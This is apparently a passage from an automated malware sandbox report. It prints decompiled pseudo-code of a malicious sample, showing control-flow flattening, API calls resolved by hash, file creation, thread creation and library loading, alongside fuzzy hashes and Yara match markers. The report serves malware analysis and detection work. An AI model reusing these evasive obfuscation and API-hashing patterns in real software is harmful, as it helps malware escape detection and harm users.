                                                                                                      									} else {
                                                                                                      										__eflags = _t95 - _t99;
                                                                                                      										if(_t95 < _t99) {
                                                                                                      											goto L16;
                                                                                                      										} else {
                                                                                                      											goto L29;
                                                                                                      										}
                                                                                                      									}
                                                                                                      								}
                                                                                                      							} else {
                                                                                                      								if(_t97 == 0x14612822) {
                                                                                                      									_t67 =  *0x20bdd8c;
                                                                                                      									__eflags = _t67;
                                                                                                      									if(_t67 == 0) {
                                                                                                      										_t71 = E020B3E70(0xbb51e2dc);
                                                                                                      										_t93 = 0xf40b8901;
                                                                                                      										_t67 = E020B3DD0(_t75, _t71, 0xf40b8901, _t100);
                                                                                                      										 *0x20bdd8c = _t67;
                                                                                                      									}
                                                                                                      									 *_t67( &_v572);
                                                                                                      									_t97 = 0xb7daed6;
                                                                                                      									continue;
                                                                                                      								} else {
                                                                                                      									if(_t97 != 0x15db38c2) {
                                                                                                      										goto L15;
                                                                                                      									} else {
                                                                                                      										_t97 = 0x27a0a68a;
                                                                                                      										continue;
                                                                                                      									}
                                                                                                      								}
                                                                                                      							}
                                                                                                      						}
                                                                                                      						L30:
                                                                                                      					}
                                                                                                      					__eflags = _t97 - 0x27a0a68a;
                                                                                                      					if(_t97 == 0x27a0a68a) {
                                                                                                      						_t49 =  *0x20be028;
                                                                                                      						__eflags = _t49;
                                                                                                      						if(_t49 == 0) {
                                                                                                      							_t74 = E020B3E70(0xbb51e2dc);
                                                                                                      							_t93 = 0x2bebef82;
                                                                                                      							_t49 = E020B3DD0(_t75, _t74, 0x2bebef82, _t100);
                                                                                                      							 *0x20be028 = _t49;
                                                                                                      						}
                                                                                                      						 *_t49(0,  &_v524, 0x104);
                                                                                                      						_t97 = 0x3b13cdbe;
                                                                                                      						goto L1;
                                                                                                      					} else {
                                                                                                      						__eflags = _t97 - 0x3b13cdbe;
                                                                                                      						if(_t97 != 0x3b13cdbe) {
                                                                                                      							goto L15;
                                                                                                      						} else {
                                                                                                      							__eflags =  *0x20bded8;
                                                                                                      							if( *0x20bded8 == 0) {
                                                                                                      								_t69 = E020B3E70(0xbb51e2dc);
                                                                                                      								_t93 = 0xe04f22b3;
                                                                                                      								 *0x20bded8 = E020B3DD0(_t75, _t69, 0xe04f22b3, _t100);
                                                                                                      							}
                                                                                                      							_t62 = CreateFileW( &_v524, _v588, _v576, 0, _v592, _v596, 0); // executed
                                                                                                      							_t96 = _t62;
                                                                                                      							__eflags = _t96 - 0xffffffff;
                                                                                                      							if(_t96 == 0xffffffff) {
                                                                                                      								break;
                                                                                                      							} else {
                                                                                                      								_t97 = 0x1de4fdf5;
                                                                                                      								goto L1;
                                                                                                      							}
                                                                                                      						}
                                                                                                      					}
                                                                                                      					goto L30;
                                                                                                      					L15:
                                                                                                      					__eflags = _t97 - 0x39234310;
                                                                                                      				} while (_t97 != 0x39234310);
                                                                                                      				L16:
                                                                                                      				__eflags = 0;
                                                                                                      				return 0;
                                                                                                      				goto L30;
                                                                                                      			}































                                                                                                      0x020b8330
                                                                                                      0x020b8330
                                                                                                      0x020b8336
                                                                                                      0x020b8345
                                                                                                      0x020b834a
                                                                                                      0x020b834e
                                                                                                      0x020b8356
                                                                                                      0x020b835e
                                                                                                      0x020b8363
                                                                                                      0x020b836b
                                                                                                      0x020b836f
                                                                                                      0x020b837e
                                                                                                      0x020b8387
                                                                                                      0x020b838b
                                                                                                      0x020b8393
                                                                                                      0x020b839b
                                                                                                      0x020b83a0
                                                                                                      0x020b83a8
                                                                                                      0x020b83a8
                                                                                                      0x020b83b0
                                                                                                      0x020b83b0
                                                                                                      0x020b83b0
                                                                                                      0x020b83b0
                                                                                                      0x020b83b6
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x020b83bc
                                                                                                      0x020b8417
                                                                                                      0x020b841c
                                                                                                      0x020b841e
                                                                                                      0x020b8425
                                                                                                      0x020b842a
                                                                                                      0x020b8431
                                                                                                      0x020b8436
                                                                                                      0x020b8436
                                                                                                      0x020b8445
                                                                                                      0x020b8449
                                                                                                      0x020b844b
                                                                                                      0x020b8456
                                                                                                      0x020b845c
                                                                                                      0x020b845e
                                                                                                      0x020b8465
                                                                                                      0x020b846a
                                                                                                      0x020b8471
                                                                                                      0x020b8476
                                                                                                      0x020b8476
                                                                                                      0x020b847c
                                                                                                      0x00000000
                                                                                                      0x020b83be
                                                                                                      0x020b83c4
                                                                                                      0x020b853b
                                                                                                      0x020b8543
                                                                                                      0x020b8563
                                                                                                      0x020b8567
                                                                                                      0x020b856f
                                                                                                      0x020b8573
                                                                                                      0x020b8577
                                                                                                      0x020b857f
                                                                                                      0x020b8581
                                                                                                      0x00000000
                                                                                                      0x020b8587
                                                                                                      0x020b8587
                                                                                                      0x020b8592
                                                                                                      0x020b859e
                                                                                                      0x020b8589
                                                                                                      0x020b8589
                                                                                                      0x020b858b
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x020b858b
                                                                                                      0x020b8587
                                                                                                      0x020b83ca
                                                                                                      0x020b83d0
                                                                                                      0x020b83e5
                                                                                                      0x020b83ea
                                                                                                      0x020b83ec
                                                                                                      0x020b83f3
                                                                                                      0x020b83f8
                                                                                                      0x020b83ff
                                                                                                      0x020b8404
                                                                                                      0x020b8404
                                                                                                      0x020b840e
                                                                                                      0x020b8410
                                                                                                      0x00000000
                                                                                                      0x020b83d2
                                                                                                      0x020b83d8
                                                                                                      0x00000000
                                                                                                      0x020b83de
                                                                                                      0x020b83de
                                                                                                      0x00000000
                                                                                                      0x020b83de
                                                                                                      0x020b83d8
                                                                                                      0x020b83d0
                                                                                                      0x020b83c4
                                                                                                      0x00000000
                                                                                                      0x020b83bc
                                                                                                      0x020b8495
                                                                                                      0x020b849b
                                                                                                      0x020b84fd
                                                                                                      0x020b8502
                                                                                                      0x020b8504
                                                                                                      0x020b850b
                                                                                                      0x020b8510
                                                                                                      0x020b8517
                                                                                                      0x020b851c
                                                                                                      0x020b851c
                                                                                                      0x020b852d
                                                                                                      0x020b852f
                                                                                                      0x00000000
                                                                                                      0x020b849d
                                                                                                      0x020b849d
                                                                                                      0x020b84a3
                                                                                                      0x00000000
                                                                                                      0x020b84a5
                                                                                                      0x020b84ab
                                                                                                      0x020b84ad
                                                                                                      0x020b84b4
                                                                                                      0x020b84b9
                                                                                                      0x020b84c7
                                                                                                      0x020b84c7
                                                                                                      0x020b84ea
                                                                                                      0x020b84ec
                                                                                                      0x020b84ee
                                                                                                      0x020b84f1
                                                                                                      0x00000000
                                                                                                      0x020b84f3
                                                                                                      0x020b84f3
                                                                                                      0x00000000
                                                                                                      0x020b84f3
                                                                                                      0x020b84f1
                                                                                                      0x020b84a3
                                                                                                      0x00000000
                                                                                                      0x020b847e
                                                                                                      0x020b847e
                                                                                                      0x020b847e
                                                                                                      0x020b848a
                                                                                                      0x020b848a
                                                                                                      0x020b8494
                                                                                                      0x00000000

                                                                                                      APIs
                                                                                                      • CreateFileW.KERNELBASE(?,?,?,00000000,?,B2D6078E,00000000,?,?,?,?,3444DC2F), ref: 020B84EA
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.519092750.00000000020B1000.00000020.00000001.sdmp, Offset: 020B0000, based on PE: true
                                                                                                      • Associated: 00000004.00000002.519085712.00000000020B0000.00000004.00000001.sdmp Download File
                                                                                                      • Associated: 00000004.00000002.519123055.00000000020BD000.00000004.00000001.sdmp Download File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_20b0000_networkitemfactory.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: CreateFile
                                                                                                      • String ID:
                                                                                                      • API String ID: 823142352-0
                                                                                                      • Opcode ID: b251ebcccdd6cec0b8598ba68f10100e0da0f55960df41582e37052c594520d4
                                                                                                      • Instruction ID: bf3f896ba517d13da910df30b07802a5d0d23e0218774ad09f236f89f977f894
                                                                                                      • Opcode Fuzzy Hash: b251ebcccdd6cec0b8598ba68f10100e0da0f55960df41582e37052c594520d4
                                                                                                      • Instruction Fuzzy Hash: DE51BE71A043019BD72ADF68D4846AFB7E6AF84744F10891DF4A59B2A0DB74DC449F82
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.518992835.0000000002091000.00000020.00000001.sdmp, Offset: 02091000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_2091000_networkitemfactory.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: b11578d8486911a57d559dd173a398af9847caf5ab36d4af94a084634ee3432c
                                                                                                      • Instruction ID: 71ef64102a4c7498fe11649175ba58e752edc86d5518a7d18628ebc7edd8e7e2
                                                                                                      • Opcode Fuzzy Hash: b11578d8486911a57d559dd173a398af9847caf5ab36d4af94a084634ee3432c
                                                                                                      • Instruction Fuzzy Hash: 9E41E974B01209EFEB45CF48C494BAAB7B6FB88314F14C159E81A5F355C775EA82EB80
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      C-Code - Quality: 68%
                                                                                                      			E020B9D90(void* __ebx) {
                                                                                                      				void* _t7;
                                                                                                      				intOrPtr* _t8;
                                                                                                      				intOrPtr _t9;
                                                                                                      				void* _t12;
                                                                                                      				intOrPtr* _t19;
                                                                                                      				intOrPtr* _t21;
                                                                                                      				void* _t25;
                                                                                                      				intOrPtr _t27;
                                                                                                      				intOrPtr _t30;
                                                                                                      				void* _t41;
                                                                                                      				void* _t42;
                                                                                                      
                                                                                                      				_t25 = __ebx;
                                                                                                      				_t7 = 0x36cc1b41;
                                                                                                      				L1:
                                                                                                      				while(_t7 != 0x26bdc705) {
                                                                                                      					if(_t7 == 0x341ca7a8) {
                                                                                                      						if( *0x20bdb9c == 0) {
                                                                                                      							 *0x20bdb9c = E020B3DD0(_t25, E020B3E70(0xbb51e2dc), 0x5054bbca, _t42);
                                                                                                      						}
                                                                                                      						_t12 = CreateThread(0, 0, E020B99E0, 0, 0, 0);
                                                                                                      						_t30 =  *0x20be36c; // 0x53be38
                                                                                                      						 *(_t30 + 0x3c) = _t12;
                                                                                                      						goto L18;
                                                                                                      					} else {
                                                                                                      						if(_t7 != 0x36cc1b41) {
                                                                                                      							if(_t7 != 0x21cf5378) {
                                                                                                      								continue;
                                                                                                      							} else {
                                                                                                      								return 0 | _t30 != 0x00000000;
                                                                                                      							}
                                                                                                      						} else {
                                                                                                      							_t19 =  *0x20bddc8;
                                                                                                      							if(_t19 == 0) {
                                                                                                      								_t19 = E020B3DD0(_t25, E020B3E70(0xbb51e2dc), 0x298e8809, _t42);
                                                                                                      								 *0x20bddc8 = _t19;
                                                                                                      							}
                                                                                                      							_t41 =  *_t19();
                                                                                                      							_t21 =  *0x20bdcf0;
                                                                                                      							if(_t21 == 0) {
                                                                                                      								_t21 = E020B3DD0(_t25, E020B3E70(0xbb51e2dc), 0xc9d236a5, _t42);
                                                                                                      								 *0x20bdcf0 = _t21;
                                                                                                      							}
                                                                                                      							_t30 =  *_t21(_t41, 8, 0x44);
                                                                                                      							 *0x20be36c = _t30;
                                                                                                      							if(_t30 == 0) {
                                                                                                      								L18:
                                                                                                      								return 0 | _t30 != 0x00000000;
                                                                                                      							} else {
                                                                                                      								_t7 = 0x26bdc705;
                                                                                                      								continue;
                                                                                                      							}
                                                                                                      						}
                                                                                                      					}
                                                                                                      				}
                                                                                                      				_t8 =  *0x20bdf6c;
                                                                                                      				if(_t8 == 0) {
                                                                                                      					_t8 = E020B3DD0(_t25, E020B3E70(0xbb51e2dc), 0x22573595, _t42);
                                                                                                      					 *0x20bdf6c = _t8;
                                                                                                      				}
                                                                                                      				_t9 =  *_t8(0, 0, 0, 0);
                                                                                                      				_t27 =  *0x20be36c; // 0x53be38
                                                                                                      				 *((intOrPtr*)(_t27 + 0x40)) = _t9;
                                                                                                      				_t7 = 0x341ca7a8;
                                                                                                      				goto L1;
                                                                                                      			}














                                                                                                      0x020b9d90
                                                                                                      0x020b9d96
                                                                                                      0x00000000
                                                                                                      0x020b9da0
                                                                                                      0x020b9db0
                                                                                                      0x020b9e86
                                                                                                      0x020b9e9e
                                                                                                      0x020b9e9e
                                                                                                      0x020b9eb2
                                                                                                      0x020b9eb4
                                                                                                      0x020b9eba
                                                                                                      0x00000000
                                                                                                      0x020b9db6
                                                                                                      0x020b9dbb
                                                                                                      0x020b9e2f
                                                                                                      0x00000000
                                                                                                      0x020b9e35
                                                                                                      0x020b9e3d
                                                                                                      0x020b9e3d
                                                                                                      0x020b9dbd
                                                                                                      0x020b9dbd
                                                                                                      0x020b9dc4
                                                                                                      0x020b9dd7
                                                                                                      0x020b9ddc
                                                                                                      0x020b9ddc
                                                                                                      0x020b9de3
                                                                                                      0x020b9de5
                                                                                                      0x020b9dec
                                                                                                      0x020b9dff
                                                                                                      0x020b9e04
                                                                                                      0x020b9e04
                                                                                                      0x020b9e10
                                                                                                      0x020b9e12
                                                                                                      0x020b9e1a
                                                                                                      0x020b9ebd
                                                                                                      0x020b9ec5
                                                                                                      0x020b9e20
                                                                                                      0x020b9e20
                                                                                                      0x00000000
                                                                                                      0x020b9e20
                                                                                                      0x020b9e1a
                                                                                                      0x020b9dbb
                                                                                                      0x020b9db0
                                                                                                      0x020b9e3e
                                                                                                      0x020b9e45
                                                                                                      0x020b9e58
                                                                                                      0x020b9e5d
                                                                                                      0x020b9e5d
                                                                                                      0x020b9e6a
                                                                                                      0x020b9e6c
                                                                                                      0x020b9e72
                                                                                                      0x020b9e75
                                                                                                      0x00000000

                                                                                                      APIs
                                                                                                      • CreateThread.KERNELBASE(00000000,00000000,020B99E0,00000000,00000000,00000000), ref: 020B9EB2
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.519092750.00000000020B1000.00000020.00000001.sdmp, Offset: 020B0000, based on PE: true
                                                                                                      • Associated: 00000004.00000002.519085712.00000000020B0000.00000004.00000001.sdmp Download File
                                                                                                      • Associated: 00000004.00000002.519123055.00000000020BD000.00000004.00000001.sdmp Download File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_20b0000_networkitemfactory.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: CreateThread
                                                                                                      • String ID:
                                                                                                      • API String ID: 2422867632-0
                                                                                                      • Opcode ID: 15117e2470decba814a11d877b40dd96e319a938901b85ccf63b4b12a1b408e1
                                                                                                      • Instruction ID: a1c34d671ffce6ceab1fc72008c35ed170dca25389c22d07ac35011bf75c41c8
                                                                                                      • Opcode Fuzzy Hash: 15117e2470decba814a11d877b40dd96e319a938901b85ccf63b4b12a1b408e1
                                                                                                      • Instruction Fuzzy Hash: E0218534B443059BE7B79B759862BE972D2BF81640F204829E615DF3C0EB78DC11AF45
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      C-Code - Quality: 58%
                                                                                                      			E020B4620(void* __ebx, void* __edx, void* __ebp) {
                                                                                                      				char _v16;
                                                                                                      				void* __ecx;
                                                                                                      				intOrPtr* _t2;
                                                                                                      				intOrPtr* _t5;
                                                                                                      				void* _t6;
                                                                                                      				intOrPtr* _t7;
                                                                                                      				void* _t14;
                                                                                                      				void* _t27;
                                                                                                      				void* _t29;
                                                                                                      				void* _t32;
                                                                                                      				void* _t33;
                                                                                                      				intOrPtr* _t37;
                                                                                                      
                                                                                                      				_t36 = __ebp;
                                                                                                      				_t13 = __ebx;
                                                                                                      				_t2 =  *0x20be0d0;
                                                                                                      				 *_t37 = 0x104;
                                                                                                      				_t32 = _t14;
                                                                                                      				_t27 = __edx;
                                                                                                      				if(_t2 == 0) {
                                                                                                      					_t2 = E020B3DD0(__ebx, E020B3E70(0xbb51e2dc), 0x6760de89, __ebp);
                                                                                                      					 *0x20be0d0 = _t2;
                                                                                                      				}
                                                                                                      				_t33 =  *_t2(0x1000, 0, _t32);
                                                                                                      				if(_t33 == 0) {
                                                                                                      					return 0;
                                                                                                      				} else {
                                                                                                      					_t5 =  *0x20be33c;
                                                                                                      					if(_t5 == 0) {
                                                                                                      						_t5 = E020B3DD0(_t13, E020B3E70(0xbb51e2dc), 0xf01f7005, _t36);
                                                                                                      						 *0x20be33c = _t5;
                                                                                                      					}
                                                                                                      					_t6 =  *_t5(_t33, 0, _t27,  &_v16); // executed
                                                                                                      					_t29 = _t6;
                                                                                                      					_t7 =  *0x20bde38;
                                                                                                      					if(_t7 == 0) {
                                                                                                      						_t7 = E020B3DD0(_t13, E020B3E70(0xbb51e2dc), 0x76fc23ac, _t36);
                                                                                                      						 *0x20bde38 = _t7;
                                                                                                      					}
                                                                                                      					 *_t7(_t33);
                                                                                                      					return _t29;
                                                                                                      				}
                                                                                                      			}















                                                                                                      0x020b4620
                                                                                                      0x020b4620
                                                                                                      0x020b4621
                                                                                                      0x020b4626
                                                                                                      0x020b462e
                                                                                                      0x020b4631
                                                                                                      0x020b4635
                                                                                                      0x020b4648
                                                                                                      0x020b464d
                                                                                                      0x020b464d
                                                                                                      0x020b465c
                                                                                                      0x020b4660
                                                                                                      0x020b46c5
                                                                                                      0x020b4662
                                                                                                      0x020b4662
                                                                                                      0x020b4669
                                                                                                      0x020b467c
                                                                                                      0x020b4681
                                                                                                      0x020b4681
                                                                                                      0x020b468f
                                                                                                      0x020b4691
                                                                                                      0x020b4693
                                                                                                      0x020b469a
                                                                                                      0x020b46ad
                                                                                                      0x020b46b2
                                                                                                      0x020b46b2
                                                                                                      0x020b46b8
                                                                                                      0x020b46bf
                                                                                                      0x020b46bf

                                                                                                      APIs
                                                                                                      • QueryFullProcessImageNameW.KERNELBASE(00000000,00000000,?,3444DC2F,?,?,3444DC2F,?), ref: 020B468F
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.519092750.00000000020B1000.00000020.00000001.sdmp, Offset: 020B0000, based on PE: true
                                                                                                      • Associated: 00000004.00000002.519085712.00000000020B0000.00000004.00000001.sdmp Download File
                                                                                                      • Associated: 00000004.00000002.519123055.00000000020BD000.00000004.00000001.sdmp Download File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_20b0000_networkitemfactory.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: FullImageNameProcessQuery
                                                                                                      • String ID:
                                                                                                      • API String ID: 3578328331-0
                                                                                                      • Opcode ID: 93bf687582c45038aab5790246d28f47402024908f21f89f63ae5f506f3adcc9
                                                                                                      • Instruction ID: 238b7dbf1b581c58b8f25a9884bc7586231be5ede656bae39d25fa28acdcd9c5
                                                                                                      • Opcode Fuzzy Hash: 93bf687582c45038aab5790246d28f47402024908f21f89f63ae5f506f3adcc9
                                                                                                      • Instruction Fuzzy Hash: 8B016175B013005BE73BABB9A850BEB22C6AFD5651F24087AE515CB280EE749C405B91
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      C-Code - Quality: 75%
                                                                                                      			E020B7010(signed int __edx) {
                                                                                                      				struct HINSTANCE__* _t6;
                                                                                                      				intOrPtr* _t7;
                                                                                                      				intOrPtr* _t9;
                                                                                                      				void* _t15;
                                                                                                      				void* _t16;
                                                                                                      				intOrPtr _t17;
                                                                                                      				signed int _t28;
                                                                                                      				void* _t29;
                                                                                                      				WCHAR* _t30;
                                                                                                      				void* _t31;
                                                                                                      
                                                                                                      				_t28 = __edx;
                                                                                                      				_t30 = E020B3460(_t16);
                                                                                                      				if( *0x20bdd48 == 0) {
                                                                                                      					 *0x20bdd48 = E020B3DD0(_t15, E020B3E70(0xbb51e2dc), 0xb290dbae, _t31);
                                                                                                      				}
                                                                                                      				_t6 = LoadLibraryW(_t30);
                                                                                                      				_t17 =  *0x20be364; // 0x538ba8
                                                                                                      				 *(_t17 + 0x10 + _t28 * 4) = _t6;
                                                                                                      				_t7 =  *0x20bddc8;
                                                                                                      				if(_t7 == 0) {
                                                                                                      					_t7 = E020B3DD0(_t15, E020B3E70(0xbb51e2dc), 0x298e8809, _t31);
                                                                                                      					 *0x20bddc8 = _t7;
                                                                                                      				}
                                                                                                      				_t29 =  *_t7();
                                                                                                      				_t9 =  *0x20bdbec;
                                                                                                      				if(_t9 == 0) {
                                                                                                      					_t9 = E020B3DD0(_t15, E020B3E70(0xbb51e2dc), 0x632f374, _t31);
                                                                                                      					 *0x20bdbec = _t9;
                                                                                                      				}
                                                                                                      				return  *_t9(_t29, 0, _t30);
                                                                                                      			}













                                                                                                      0x020b7012
                                                                                                      0x020b7019
                                                                                                      0x020b7022
                                                                                                      0x020b703a
                                                                                                      0x020b703a
                                                                                                      0x020b7040
                                                                                                      0x020b7042
                                                                                                      0x020b7048
                                                                                                      0x020b704c
                                                                                                      0x020b7053
                                                                                                      0x020b7066
                                                                                                      0x020b706b
                                                                                                      0x020b706b
                                                                                                      0x020b7072
                                                                                                      0x020b7074
                                                                                                      0x020b707b
                                                                                                      0x020b708e
                                                                                                      0x020b7093
                                                                                                      0x020b7093
                                                                                                      0x020b70a0

                                                                                                      APIs
                                                                                                      • LoadLibraryW.KERNELBASE(00000000,?,3444DC2F,020B723F,?,3444DC2F,020B6587), ref: 020B7040
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.519092750.00000000020B1000.00000020.00000001.sdmp, Offset: 020B0000, based on PE: true
                                                                                                      • Associated: 00000004.00000002.519085712.00000000020B0000.00000004.00000001.sdmp Download File
                                                                                                      • Associated: 00000004.00000002.519123055.00000000020BD000.00000004.00000001.sdmp Download File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_20b0000_networkitemfactory.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: LibraryLoad
                                                                                                      • String ID:
                                                                                                      • API String ID: 1029625771-0
                                                                                                      • Opcode ID: 65dabab8adb2d7f2c706aa138f0117d0761c033399c7d9a27a17dcd8039269df
                                                                                                      • Instruction ID: 803585488e9994ea696e74f6fdc56fe177a414adf7e8eb6db98e997ac672b841
                                                                                                      • Opcode Fuzzy Hash: 65dabab8adb2d7f2c706aa138f0117d0761c033399c7d9a27a17dcd8039269df
                                                                                                      • Instruction Fuzzy Hash: F8014F34B543048BA77BAB75A850AEA66D7BFC6680B24086AE015CB390EA349C419F91
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.518992835.0000000002091000.00000020.00000001.sdmp, Offset: 02091000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_2091000_networkitemfactory.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ExitProcess
                                                                                                      • String ID:
                                                                                                      • API String ID: 621844428-0
                                                                                                      • Opcode ID: d07987858a862a0fcc0286bf70475e96e3d81717c98dddaab20f2d49498ac143
                                                                                                      • Instruction ID: 56b6357fbdba43837e51779957142467a915b67b13bafdc1e651167a51e63571
                                                                                                      • Opcode Fuzzy Hash: d07987858a862a0fcc0286bf70475e96e3d81717c98dddaab20f2d49498ac143
                                                                                                      • Instruction Fuzzy Hash: EFD05EB4D40308FFEB00EFA4D90AB9DBBB4EB44305F108164E9066B240E6B02A14EF52
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • VirtualFree.KERNELBASE(?,?,?), ref: 0209182F
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.518992835.0000000002091000.00000020.00000001.sdmp, Offset: 02091000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_2091000_networkitemfactory.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: FreeVirtual
                                                                                                      • String ID:
                                                                                                      • API String ID: 1263568516-0
                                                                                                      • Opcode ID: 4a9a4ef612acce1c7d5140fbb6215fe52ffbb065f6ed7ed9d9e5a8718d0bf9f3
                                                                                                      • Instruction ID: 0e4d97b1ec96611701f7d3b439aa80a6b3ee7e833a3ba08a6bc80d0c156c895e
                                                                                                      • Opcode Fuzzy Hash: 4a9a4ef612acce1c7d5140fbb6215fe52ffbb065f6ed7ed9d9e5a8718d0bf9f3
                                                                                                      • Instruction Fuzzy Hash: 91C04C7A55430CAB8B04DF98E894DAB37ADBB8C610B048548BA1D87200C634F920CBA4
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Non-executed Functions

                                                                                                      C-Code - Quality: 100%
                                                                                                      			E0041989E(short _a4, intOrPtr _a8) {
                                                                                                      				short _t13;
                                                                                                      				short _t28;
                                                                                                      
                                                                                                      				_t28 = _a4;
                                                                                                      				if(_t28 != 0 &&  *_t28 != 0 && E00418AEC(_t28, ?str?) != 0) {
                                                                                                      					if(E00418AEC(_t28, ?str?) != 0) {
                                                                                                      						return E0041CFA6(_t28);
                                                                                                      					}
                                                                                                      					if(GetLocaleInfoW( *(_a8 + 8), 0x2000000b,  &_a4, 2) == 0) {
                                                                                                      						L9:
                                                                                                      						return 0;
                                                                                                      					}
                                                                                                      					return _a4;
                                                                                                      				}
                                                                                                      				if(GetLocaleInfoW( *(_a8 + 8), 0x20001004,  &_a4, 2) == 0) {
                                                                                                      					goto L9;
                                                                                                      				}
                                                                                                      				_t13 = _a4;
                                                                                                      				if(_t13 == 0) {
                                                                                                      					return GetACP();
                                                                                                      				}
                                                                                                      				return _t13;
                                                                                                      			}





                                                                                                      0x004198a2
                                                                                                      0x004198a7
                                                                                                      0x004198cf
                                                                                                      0x00000000
                                                                                                      0x004198f8
                                                                                                      0x004198ea
                                                                                                      0x00419916
                                                                                                      0x00000000
                                                                                                      0x00419916
                                                                                                      0x00000000
                                                                                                      0x004198ec
                                                                                                      0x00419914
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x0041991a
                                                                                                      0x0041991f
                                                                                                      0x00419923
                                                                                                      0x00419923
                                                                                                      0x004198f1

                                                                                                      APIs
                                                                                                      • GetLocaleInfoW.KERNEL32(?,2000000B,?,00000002,?,?,00419B64,?,00000000), ref: 004198E2
                                                                                                      • GetLocaleInfoW.KERNEL32(?,20001004,?,00000002,?,?,00419B64,?,00000000), ref: 0041990C
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.517349671.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000004.00000002.517330948.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000004.00000002.517474954.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000004.00000002.517525073.0000000000435000.00000004.00020000.sdmp Download File
                                                                                                      • Associated: 00000004.00000002.517547397.0000000000439000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000004.00000002.517583104.000000000044E000.00000002.00020000.sdmp Download File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_400000_networkitemfactory.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: InfoLocale
                                                                                                      • String ID: ACP$OCP
                                                                                                      • API String ID: 2299586839-711371036
                                                                                                      • Opcode ID: cabdbbd5868a657c31b8c1cdf763834c51e0b95cee304dc5e2cd22d40fd77b4c
                                                                                                      • Instruction ID: c15aaa84b1a0d257b2612772592e480fa80fbb188541d3fbec629ad599b2e7d0
                                                                                                      • Opcode Fuzzy Hash: cabdbbd5868a657c31b8c1cdf763834c51e0b95cee304dc5e2cd22d40fd77b4c
                                                                                                      • Instruction Fuzzy Hash: 20018431214216ABDB10AF25DC51FD737A8AF05764B00842BFA08DA250EB68DDC18798
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      C-Code - Quality: 58%
                                                                                                      			E020B1F60(intOrPtr* __ecx, intOrPtr* __edx) {
                                                                                                      				void* __ebx;
                                                                                                      				void* __ebp;
                                                                                                      				void* _t26;
                                                                                                      				intOrPtr* _t28;
                                                                                                      				intOrPtr* _t31;
                                                                                                      				intOrPtr* _t32;
                                                                                                      				intOrPtr* _t35;
                                                                                                      				intOrPtr* _t37;
                                                                                                      				intOrPtr* _t38;
                                                                                                      				intOrPtr* _t42;
                                                                                                      				signed int _t43;
                                                                                                      				intOrPtr _t47;
                                                                                                      				signed int _t48;
                                                                                                      				intOrPtr* _t53;
                                                                                                      				intOrPtr* _t57;
                                                                                                      				intOrPtr* _t58;
                                                                                                      				intOrPtr _t60;
                                                                                                      				intOrPtr _t71;
                                                                                                      				intOrPtr* _t79;
                                                                                                      				intOrPtr _t88;
                                                                                                      				void* _t89;
                                                                                                      				intOrPtr _t91;
                                                                                                      				intOrPtr _t93;
                                                                                                      				intOrPtr _t94;
                                                                                                      				intOrPtr* _t95;
                                                                                                      				void* _t96;
                                                                                                      				void* _t98;
                                                                                                      				void* _t99;
                                                                                                      
                                                                                                      				_t58 = __ecx;
                                                                                                      				_t88 =  *((intOrPtr*)(_t96 + 0x1c));
                                                                                                      				_t95 = __edx;
                                                                                                      				 *((intOrPtr*)(_t96 + 0x10)) = __ecx;
                                                                                                      				_t57 = 0;
                                                                                                      				_t26 = 0x2e352190;
                                                                                                      				while(1) {
                                                                                                      					_t91 =  *((intOrPtr*)(_t96 + 0x18));
                                                                                                      					goto L2;
                                                                                                      					L3:
                                                                                                      					if(_t98 == 0) {
                                                                                                      						__eflags =  *((intOrPtr*)(_t58 + 4)) - 0x74;
